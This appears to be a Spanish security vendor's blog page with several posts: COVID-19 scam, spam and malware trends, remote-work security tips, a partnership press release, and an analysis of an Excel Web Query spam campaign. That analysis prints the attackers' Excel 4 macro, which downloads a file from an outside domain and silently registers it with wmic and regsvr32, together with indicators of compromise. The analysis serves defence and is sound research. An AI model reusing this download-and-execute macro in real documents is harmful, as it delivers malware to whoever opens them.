Oportunistas del coronavirus: ¿cómo se aprovechan los cibercriminales?

Oportunistas del coronavirus: ¿cómo se aprovechan los cibercriminales?

En tiempos de crisis siempre hay oportunistas que tratan de aprovecharse de la situación. Esto también ocurre con la actual pandemia del coronavirus COVID19. De hecho, los expertos de Hornetsecurity observan cada vez más campañas que se desarrollan con bastante frecuencia. Actualmente, el porcentaje de correos electrónicos maliciosos que contienen enlaces usando el tema del coronavirus se está disparando.

A continuación, describiremos cómo la situación actual de crisis está sirviendo cada vez más a los ciberdelincuentes como gancho para el fraude, así como para la propagación de spam y malware.

 

 

En comparación con la cantidad total de correos electrónicos clasificados como maliciosos por Hornetsecurity, la cantidad de correos electrónicos que usan el tema del coronavirus sigue siendo pequeña, pero en aumento.

Para dar a los lectores una idea de cómo los ciberdelincuentes están explotando la crisis del coronavirus COVID19 con diversas actividades, el Security Lab de Hornetsecurity explicará a continuación algunas de sus observaciones diarias:

 

Análisis

Observaremos tres actividades:

– Scams
– Spam
– Malware

 

Sextorsiones chantajistas usando el COVID19 para sus estafas

En primer lugar, nos fijaremos en las estafas: una estafa que se mantiene en el tiempo es la sextorsión. En estas estafas de sextorsión, una víctima recibe un correo electrónico afirmando que su ordenador ha sido hackeado y que le han grabado en video mientras visitaba una web porno. Con el fin de evitar que este vídeo se comparta con los amigos y familiares de la víctima debe transferir una cantidad en criptomonedas (generalmente Bitcoin) a una dirección Bitcoin específica. Obviamente, el ordenador de la víctima no se ha visto comprometido y no se ha tomado ningún vídeo.

Un grupo de actividades fraudulentas que el Security Lab de Hornetsecurity viene observando y que está involucrado en tales estafas de sextorsión. Se ha hecho pasar por la OMS y pide a las víctimas donaciones usando como gancho el tema del coronavirus.

A continuación, puedes ver algunos de estos tipos de correos electrónicos fraudulentos:

 

 

Otro tipo de fraude que se está dando, es el de pedir Bitcoins con la excusa de que quieren proteger a la víctima para no propagar el virus:

 

En el siguiente gráfico se puede ver que el aumento de la actividad va relacionado a la estafa de la OMS que utiliza las direcciones Bitcoin 16gmYrbqMr4SZeA7SqNVmirhnhDG3maYPK y 13Rfk6FXkqswaYnqMys5BkiDvJbwVdL8TD (color azul y rojo) mientras que la estafa hacia arriba pidiendo BTC utiliza BTC utiliza BTC utiliza BTC utiliza 18P3S6DuNUpW2WLozsrrW6rRd6xh24Rc7N (en verde):

 

 

Se pueden observar, otros grupos de actividades que todavía siguen en su línea sin usar el tema del coronavirus. Pero ¿por qué las estafas clásicas de sextorsión siguen todavía en uso?

 

Spam de máscaras N95/FFP3 

A continuación, echamos un vistazo a los spammers. Estos grupos generalmente intentan vender los productos o servicios receptores, o intentan generar tráfico para sitios web (SEO ilícito) o aumentar el interés en las acciones (manipulación del mercado).

Aquí está claro qué productos relacionados con la crisis del coronavirus son propensos a spam – máscaras. Muchos de ellos:

 

El gráfico que aparece a continuación, muestra no sólo la diversidad de diferentes máscaras que se anuncian, sino que también el volumen general de estos correos electrónicos – no deseados – está aumentando:

 

 

Distribución masiva de Malware

Por último, pero no menos importante, las actividades que distribuyen malware también están monitorizando correos electrónicos relacionados con el tema del coronavirus. Por ello, presentamos información sobre un grupo de actividad de amenazas que se ha observado distribuyendo Formbook [1], Loki Bot [2], Agent Tesla [3] y AZORult [4] malware dentro de varios archivos (ZIP, RAR, ACE, ISO, GZ, …) como adjuntos a correos electrónicos.

Mientras que los expertos del Security Lab de Hornetsecurity han rastreado esta actividad, el 17 de marzo de 2020 algunos correos electrónicos pertenecientes a este grupo de actividades comenzaron a usar «Coronavirus» o «Covid-19» en el asunto o en los nombres de los archivos adjuntos. Esta tendencia sigue aumentando, como se puede ver en el siguiente gráfico, que muestra los correos electrónicos de este grupo de actividades. Los que no usan el tema del coronavirus aparecen en verde y correos electrónicos que usan el tema de coronavirus, aparecen en rojo:

 

 

Conclusión y reparación

En general, el riesgo de amenaza que tienen este tipo de actividades para la economía es el mismo que antes de la crisis. Los ciberdelincuentes siguen utilizando los mismos esquemas y mecanismos.

Sin embargo, es muy probable que las víctimas potenciales sean más propensas a caer en las prácticas fraudulentas en vista de la situación actual. Otro aspecto que no debe descuidarse es que los correos electrónicos que abordan temas sensibles en tiempos de crisis también abordan los aspectos psicológicos de sus víctimas e incluso pueden agregar una tensión adicional sobre ellas.

Un buen sistema de filtrado de correo electrónico debe evitar que estos correos electrónicos lleguen a los buzones de los usuarios finales, independientemente de si contienen una referencia al coronavirus o no.

Spam and Malware Protection de Hornetsecurity ofrece las tasas de detección más altas del mercado con una detección de spam garantizada del 99,9 % y una detección de virus del 99,99 %. Esto significa que incluso los oportunistas que quieren explotar la crisis del coronavirus no tienen posibilidad alguna de colarse en los buzones de los usuarios finales y causar daños.

 

Referencias:

¿Brechas de seguridad durante el teletrabajo? El desafío de la ciberseguridad en tiempos de crisis

¿Brechas de seguridad durante el teletrabajo? El desafío de la ciberseguridad en tiempos de crisis

El número de infecciones por Coronavirus está aumentando cada día de manera dramática, por ello hemos tenido que tomar medidas drásticas. Tiendas, restaurantes y otros muchos lugares públicos están cerrados para evitar la propagación del virus.  Los empleados de miles de empresas están teletrabajando. Durante esta situación extraordinaria y a veces abrumadora, las empresas y los empleados no deberían tener que enfrentarse a temores adicionales sobre la ciberseguridad en su hogar. Hornetsecurity tiene algunas recomendaciones para esto.

El progreso de la digitalización y el desarrollo de nuevas tecnologías ya ha traído muchos cambios para la economía en todo el mundo. La computación en la nube, el big data, la robótica y la inteligencia artificial ofrecen a las empresas ventajas como la optimización de procesos, la capacidad de ahorrar recursos y el intercambio rápido de datos e información. Se han creado nuevas empresas y puestos de trabajo como consecuencia de estos desarrollos. Además, muchos empleados ahora pueden realizar sus tareas sin que importe  su ubicación, mientras continúan comunicándose con sus jefes y compañeros. Como resultado, la mayoría de las empresas hacen posible que sus empleados trabajen desde casa.

Microsoft Office 365 se considera como un importante impulsor del trabajo colaborativo a través de la nube. Los archivos importantes se pueden almacenar e intercambiar desde cualquier lugar en tiempo real. Esto hace que trabajar desde casa sea aún más fácil. En tiempos de crisis, tener empleados trabajando desde casa es a menudo la única manera para que las empresas garanticen la seguridad de su fuerza de trabajo mientras mantienen las operaciones comerciales. Tanto los empleadores como los empleados se enfrentan a grandes desafíos por este cambio. Las preguntas más frecuentes giran en torno al tema de la seguridad de TI:

  • ¿Cómo se puede proteger la infraestructura de TI corporativa cuando los empleados trabajan desde el hogar?
  • ¿Tienen que tomar medidas específicas las empresas y los empleados?
  • ¿Siguen estando activos los mecanismos de protección, como los filtros de spam y virus mientras teletrabajamos?

Los siguientes son algunos consejos con respecto a las precauciones de seguridad que podrían ser utilizados durante el teletrabajo para garantizar la protección de los datos internos de la empresa. También discutimos las medidas de seguridad especiales para Office 365, ya que los usuarios del servicio en la nube de Microsoft son cada vez más el blanco de los hackers y cómo los ciberdelincuentes se están aprovechando del miedo a la propagación de COVID-19 y la distribución de correos electrónicos de phishing y sitios web falsos con el fin de obtener contraseñas, nombres de usuario y direcciones de correo electrónico.

Según los expertos en ciberseguridad de Hornetsecurity, se deben tomar y considerar las siguientes precauciones en el domicilio:

  • Uso de un servicio VPN para que los empleados puedan establecer una conexión segura con la red de la empresa (seguridad perimetral).
  • Instalación de las actualizaciones más recientes para sistemas operativos y aplicaciones.
  • Restringir los derechos de acceso de las personas que se conectan a la red corporativa
  • Todos los dispositivos corporativos; incluidos los smartphones y portátiles, deben estar protegidos por el software de seguridad adecuado. Idealmente, esto incluirá funciones de borrado de datos para dispositivos reportados como perdidos o robados, separación de datos personales y profesionales, y restricciones en la instalación de aplicaciones.
  • Formación a los empleados para informar sobre los peligros que pueden estar asociados con mensajes no solicitados.
  • Los usuarios de Office 365 son el objetivo principal de los ciberdelincuentes, especialmente en estos momentos de crisis. Por lo tanto, los expertos en ciberseguridad recomiendan no depender únicamente de los mecanismos de protección de Microsoft, sino de proteger además las cuentas de Office 365 con soluciones de terceros. (Leer más)

Los hackers utilizan la crisis para lanzar ataques cibernéticos dirigidos:

Desde principios de febrero, el Security Lab de Hornetsecurity ha estado monitoreando varias campañas de correo electrónico de phishing destinadas a aprovechar direcciones de correo electrónico y contraseñas o contrabandear malware en los sistemas de los destinatarios a través de enlaces y documentos adjuntos. El malware puede ser ransomware o spy software.  Aquí, puedes encontrar más información sobre los métodos de los hackers.

Para obtener una visión general de la difusión mundial del Coronavirus, la gente está accediendo al «mapa de Coronavirus» interactivo creado por la Universidad John Hopkins. Durante los últimos días, una versión falsa de este sitio web ha estado circulando en Internet e instalará malware en los ordenadores de los usuarios.

Los expertos en ciberseguridad de Hornetsecurity asumen que las estafas sobre el Coronavirus continuarán aumentando en un futuro próximo. Esperamos, por ejemplo, correos electrónicos falsos de autoridades sanitarias e instituciones gubernamentales similares o correos electrónicos de phishing de supuestas organizaciones benéficas que piden donaciones para hospitales e instalaciones médicas de emergencia.

Somos conscientes de que es extremadamente importante comunicarse de forma fiable y segura, especialmente en tiempos de crisis. Por lo tanto, nos gustaría aprovechar esta oportunidad para informar a nuestros clientes de que, a pesar de la situación excepcional actual, nuestros servicios seguirán garantizando la seguridad integral de su comunicación por correo electrónico.

Si tiene más preguntas, estamos encantados de responderlas en cualquier momento.

Hornetsecurity y api lanzan conjuntamente Cloud Security para Office 365

Hornetsecurity y api lanzan conjuntamente Cloud Security para Office 365

Hornetsecurity entra en la próxima e importante asociación con api Computerhandels GmbH como tercer distribuidor con el fin de aumentar aún más la penetración del comercio alemán de TI. La cooperación tiene ventajas estratégicas para ambas partes: mientras que Hornetsecurity vuelve a aumentar considerablemente su presencia en el canal alemán y al mismo tiempo obtiene acceso a otros mercados europeos, api está ampliando su cartera de servicios de valor añadido para incluir importantes elementos de seguridad.

En su búsqueda de otro distribuidor, Hornetsecurity apostó por los muchos años de experiencia de api y su amplio alcance. La empresa, fundada en 1994 y con sede en Baesweiler y varias sucursales nacionales e internacionales, lleva más de 25 años operando con gran éxito en el sector de la tecnología de la información y presta servicios a más de 14.000 clientes especializados y mayoristas, así como a empresas de sistemas.

Api aporta una gran confianza como proveedor de gama completa con un sistema logístico altamente automatizado y se centra paralelamente en la expansión de sus servicios de valor añadido. Un aspecto importante aquí es el establecimiento de una amplia cartera de seguridad informática. Con sus soluciones en la nube para la comunicación segura por correo electrónico, Hornetsecurity proporciona servicios decisivos en esta área. En particular, el paquete de seguridad y cumplimiento para la nube de Microsoft Office 365, 365 Total Protection y el servicio 365 Total Encryption para el cifrado de contenido de correo electrónico en Office 365 juegan un papel clave.

«La asociación tiene una importancia estratégica para api y Hornetsecurity», comenta Daniel Blank, director ejecutivo de Hornetsecurity. «En los próximos tres años desaparecerá hasta el 70% del appliance local para la seguridad del correo electrónico, el archivo de correo electrónico y el cifrado. Los analistas como Gartner a veces pintan un cuadro aún más claro: mientras que las grandes y medianas empresas llevan mucho tiempo confiando en los productos en la nube y desde hace un año han estado subcontratando sus buzones de correo a proveedores de servicios globales como Microsoft, la gran sacudida en Alemania es inminente».

Daniel Blank, COO de Hornetsecurity

«Api ofrece acceso a grandes partes del comercio especializado alemán y así completa nuestro acceso al mercado. Así hemos llevado con éxito nuestra transformación a un negocio de distribución al 100%», continúa diciendo Daniel Blank. «Desde enero, los partners sólo han podido completar su participación en el Hornetsecurity Channel-Programm seleccionando una distribución autorizada como su canal de suministro».

Andreas Printz, director de compras de api, asegura: «Las proveedores de sistemas se enfrentan al gran reto de proteger totalmente la infraestructura de TI de las organizaciones. Las soluciones de nube como Office 365 se utilizan cada vez más. También es responsabilidad de los socios comerciales especializados comprender los requisitos de protección y seguridad de los datos de sus clientes y ofrecer un valor añadido adecuado. Con los servicios de Hornetsecurity, podemos proporcionarles las herramientas necesarias para asegurar la comunicación por correo electrónico y así cerrar uno de los principales puntos de entrada de los ataques cibernéticos. En api, siempre nos esforzamos por estar correctamente posicionados para los desafíos actuales y futuros a fin de satisfacer los diversos requisitos de nuestros clientes de manera rápida y fiable».

Acerca de Hornetsecurity Group

Hornetsecurity es el principal proveedor alemán de seguridad en la nube para el correo electrónico en Europa y protege la infraestructura de TI, la comunicación digital y los datos de empresas y organizaciones de todos los tamaños. El especialista en seguridad de Hanóver presta sus servicios a través de 9 centros de datos redundantes en todo el mundo. El portafolio de productos cubre todas las áreas importantes de la seguridad del correo electrónico, desde filtros de spam y virus, archivo y encriptación de conformidad con la ley, hasta la defensa contra el fraude del CEO y ransomware. Hornetsecurity está representada internacionalmente con unos 200 empleados, en 11 diferentes lugares y opera con su red de distribuidores internacionales en más de 30 países. Sus aproximadamente 40.000 clientes incluyen a Swisscom, Telefónica, KONICA MINOLTA, LVM Versicherung, DEKRA y Claas.

Acerca de api Computerhandels GmbH

Debido al constante crecimiento, el incremento de cooperaciones con los fabricantes y un apoyo confiable y flexible al cliente, api Computerhandels GmbH es un socio fuerte en la distribución de TI que se centra en servir al comercio especializado cualificado y a los proveedores de sistemas.

Un asesoramiento competente representa el equipo de soporte en oficinas tanto nacionales como internacionales, que se complementa con equipos de ventas bien capacitados y el extenso sector de VAD con nuestra academia. Le invitamos a visitarnos en www.api.de.

Campaña misteriosa de spam: análisis de seguridad

Campaña misteriosa de spam: análisis de seguridad

Aunque el mal uso de Excel Web Query (IQY) para la propagación de malware no es nada nuevo [1], un caso reciente ha desconcertado no sólo a los investigadores del Security Lab de Hornetsecurity, sino también a otros analistas de seguridad [3][6]. Una campaña de spam de correo electrónico en la que se entregan documentos de Excel malignos en archivos comprimidos. Una vez realizado el análisis en los ordenadores por los expertos en ciberseguridad, la aplicación de la calculadora de Windows se inicia automáticamente. Los analistas suponen que los atacantes pueden estar tratando de desviar la atención de la intención real del documento malicioso que se entregó a las víctimas. En este informe, el Security Lab de Hornetsecurity,  llega al fondo del caso.

El procedimiento

Los documentos maliciosos se distribuyen como archivos adjuntos zip llamados invoice*.xls.zip, siendo la parte * la única variable. El mensaje de correo electrónico adjunto es muy breve, a veces sin y otras con saludo, pero siempre con una referencia al archivo adjunto sin ningún texto adicional:

Tan pronto como se abre el documento, aparece un pop up con un falso mensaje de diálogo que dice: «Encontramos un problema con el contenido. ¿Quiere intentar recuperar lo máximo posible?»:

Luego el documento utiliza Excel Web Query para descargar código de macro adicional desde una ubicación remota. Uno de esos códigos de macros observados descargó y ejecutó un archivo ejecutable (identificado como w32-dll-run-shellcode.dll), que a su vez ejecutó la aplicación de calculadora de Windows calc.exe.

El Security Lab de Hornetsecurity asume que este no era o es el objetivo previsto. Sin embargo, la investigación de la OSINT y la correlación con otras fuentes indican que el único programa recargado era w32-dll-run-shellcode.dll. No se sabe si en algún otro momento se entregó un archivo recargado malicioso en lugar del w32-dll-run-shellcode.dll. Tampoco se sabe si w32-dll-run-shellcode.dll fue/está entregado intencionalmente o por error.

Análisis técnico

El documento

El documento tiene una hoja oculta:

En esta tabla oculta en las celdas, el código macro para el pop up engañoso descrito anteriormente puede verse:

Cuando se ejecuta el documento sin Internet, se muestra un error con la URL maliciosa que debería haberse cargado:

Si el documento se ejecuta en Internet emulada y la consulta recibe una respuesta genérica, se informa de un error de consulta en la Web:

Sabiendo esto, las conexiones de datos de la carpeta pueden ser examinadas para revelar la cadena de conexión de la consulta Web:

Desafortunadamente, el Archivo de Consulta Web de Excel (IQY) no pudo ser cargado y las conexiones HTTP fueron redirigidas a https://www.google.com/ usando un código 301. Es una técnica conocida para negar a los investigadores de seguridad informática el acceso al objetivo. Esto podría basarse en rangos de direcciones IP o en el llamado geofencing, de modo que sólo las redes de víctimas previstas tengan acceso al objetivo verdadero, o la URL sólo podría permitir un cierto número de descargas del objetivo antes de la redirección.

Se sabe por otras fuentes que se devolvió una solicitud de consulta web de Excel:

Mientras que los comandos =CLOSE(FALSE) le indican a Excel que cierre la tabla, hemos examinado más a fondo la base URL /lander/excel4_158158672/index.html. Sin embargo, también fue redirigido a https://www.google.com/.
  Finalmente, /lander/excel4 devuelve el siguiente macro de Excel 4:
=CALL(«urlmon»,»URLDownloadToFileA»,»JJCCJJ»,0,»https://merystol.xyz/SDVsdv23r»,»c:\\Users\\Public\\fbafb4234.html»,0,0)
=IF(ALERT(«The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.»,2), WAIT(NOW()+»00:00:01″), )
=EXEC(«wmic process call create «»regsvr32 -s c:\\Users\\Public\\fbafb4234.html»»»)
=CLOSE(FALSE)

Esta macro descarga un archivo de https://merystol.xyz/SDVsdv23r a c:\\\usuario\\publico\\fbafb4234.html via urlmon.URLDownloadToFileA. Entonces regsvr32 a través de la llamada de proceso wmic creada para registrar sigilosamente (-s switch) el DLL descargado.

Y aquí es donde el caso se vuelve extraño: mientras que la anterior URL https://merystol.xyz/SDVsdv23r fue redirigida a https://www.google.com/ durante nuestro análisis, en VirusTotal se puede ver que en un momento dado la URL cargó un archivo con el hash 85697bfc0e89c5499a46aeec656b3b9facd8b9fe7174b3db9b2b9f7dbcbaaedb lud [2].

El w32-dll-run-shellcode.dll es muy simple, no contiene importaciones y apenas tiene una secuencia de caracteres:

$ strings 85697bfc0e89c5499a46aeec656b3b9facd8b9fe7174b3db9b2b9f7dbcbaaedb.bin
!This program cannot be run in DOS mode.
Rich
.text
`.rdata
@.reloc
RhcalcTYRQd
WinEu
w32-dll-run-shellcode.dll
_DllMain@12

El Githubtribution a través de la cadena w32-dll-run-shellcode.dll conduce a https://github.com/CryptXor/win-exec-calc-shellcode/blob/master/build_config.py (un clon del proyecto original en https://code.google.com/archive/p/win-exec-calc-shellcode/). El código en cuestión es idéntico a https://github.com/CryptXor/win-exec-calc-shellcode/blob/master/w32-exec-calc-shellcode.asm. Es un viejo código PoC de un agresivo investigador de seguridad que ejecuta calc.exe.

La descarga de este w32-dll-run-shellcode.dll también fue observada por otros investigadores [3].

El mismo w32-dll-run-shellcode.dll también estaba disponible en https://brinchik.xyz/Qz8ZNnxg [4]. Un esquema de nombres de dominio y URL que coincide con el malware observado aquí. La misma URL se redirige a una URL descargando Ursnif. Esto fue previamente verificado por otro investigador [5]. Esto significa que es probable que la ejecución de calc.exe sea un movimiento calculado por los atacantes para distraer del análisis el objetivo real. No se puede determinar en este momento si esta campaña está relacionada con Ursnif y quién está detrás de ella.

Entrega

 

 

Los correos electrónicos se envían desde cuentas de correo real aol.com (89%) y wp.pl (11%). Por lo tanto, los correos electrónicos de aol.com también pasan la validación de la DMARC. No pudimos observar ninguna reutilización de las direcciones de correo electrónico, es decir, la entrega se programó definitivamente para asegurar que se utilizara un único correo electrónico del remitente para cada envío. Sin embargo, los hackers no se dirigieron a ningún sector o industria específica.

Los correos electrónicos fueron entregados el 14.02.2020, 19.02.2020, 20.02.2020 y 21.02.2020:

Los nombres de los remitentes siguen el patrón firstname.lastname[0-9a-z]{0,5}@(aol.com|wp.pl).

El bajo volumen de correo electrónico también podría indicar que se trata de una primera prueba o demostración de un nuevo tipo de documento malicioso que utiliza consultas web de Excel.

Conclusión y recomendaciones

 

Esta campaña utiliza macros de Excel 4 y consultas web de Excel para ejecutar y desplegar un malware de segunda fase, aún desconocido. Esto probablemente permite eludir algunos mecanismos de defensa que sólo buscan macros VBA. Todavía se desconoce exactamente qué carga útil se entrega y si la entrega del malware de la 2ª etapa, que simplemente abre la aplicación informática, está diseñada como una solución de análisis o como un error. Sin embargo, el tiempo empleado en el envío del correo electrónico y las redirecciones a Google a través de la URL del objetivo indica que se trata de un desvío calculado.

    Los usuarios pueden protegerse de este tipo de documentos maliciosos de la siguiente manera:
  • Desactivando macros y contenido remoto en Office.
  • No habilitando la funcionalidad de edición o de macro, aunque lo indique un documento.
Hornetsecurity ya está bloqueando este tipo de campaña maliciosa y el Security Lab sigue vigilando la situación.

Indicadores de Compromiso (IOCs)

Hashes
SHA256Description
018902c1bbfe41581710c5efad2a2c9f516bd7aa98dc8432584520623e7eb2bcDocument
6dcc25eb214c38bc942ffdbe8680a1dec867ac4780aac7262391298d561b5928Document
822054123910494bbb80cc4e46f79f045cc527dc12d89bda4b8b58bd9be417f7Document
dc778302fefac2735c112311736e2050eef7a2b84b1e1569b0456e8349d0715cDocument
e1bf01178976efeedcd277f83bebc02f8f4d687d7348d906950a0a524f3f1a98Document

DNSs

  • doolised.xyz
  • emmnebuc.xyz
  • merystol.xyz
  • veqejzkb.xyz

MITRE ATT&CK técnicas

 

TácticaIDNombreDescripción
Acceso InicialT1193Spearphishing AttachmentManda email para obtener acceso inicial.
EjecuciónT1204User ExecutionLa víctima ejecuta la carga.
EjecuciónT1047Windows Management InstrumentationWMI se usó para ejecutar la carga de la segunda etapa de la carga útil.
Defensa EvasiónT1117Regsvr32Ejecución del proxy de la carga útil de la segunda etapa.